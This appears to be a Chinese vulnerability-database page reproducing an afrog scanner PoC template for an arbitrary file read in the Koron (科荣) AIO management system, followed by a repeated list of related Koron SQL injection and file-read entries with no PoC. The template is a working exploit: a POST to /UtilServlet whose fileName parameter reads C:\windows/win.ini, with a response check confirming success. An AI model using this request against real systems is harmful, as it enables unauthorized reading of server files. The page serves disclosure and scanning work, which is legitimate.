koron-aio-fileread: 科荣 AIO 管理系统存在文件读取

PoC代码[已公开]

id: koron-aio-fileread

info:
  name: 科荣 AIO 管理系统存在文件读取
  author: zan8in
  severity: high
  verified: true
  description: 科荣 AIO 管理系统存在文件读取
  tags: koron,fileread
  created: 2023/09/03

rules:
  r0:
    request:
      method: POST
      path: /UtilServlet
      body: |
        operation=readErrorExcel&fileName=C:\windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/koron-aio-fileread.yaml

koron-aio-fileread: 科荣 AIO 管理系统存在文件读取

漏洞描述

PoC代码[已公开]

相关漏洞推荐

漏洞描述

PoC代码[已公开]

相关漏洞推荐

科荣AIO管理系统 endTime SQL注入漏洞 无POC

科荣AIO管理系统 endTime 参数存在SQL注入漏洞 无POC

科荣AIO管理系统 /PublicServlet 文件读取漏洞 无POC

科荣AIO管理系统 /moffice planId 参数 SQL 注入漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

科荣AIO管理系统 endTime SQL注入漏洞无POC

科荣AIO管理系统 endTime 参数存在SQL注入漏洞无POC

科荣AIO管理系统 /PublicServlet 文件读取漏洞无POC

科荣AIO管理系统 /moffice planId 参数 SQL 注入漏洞无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC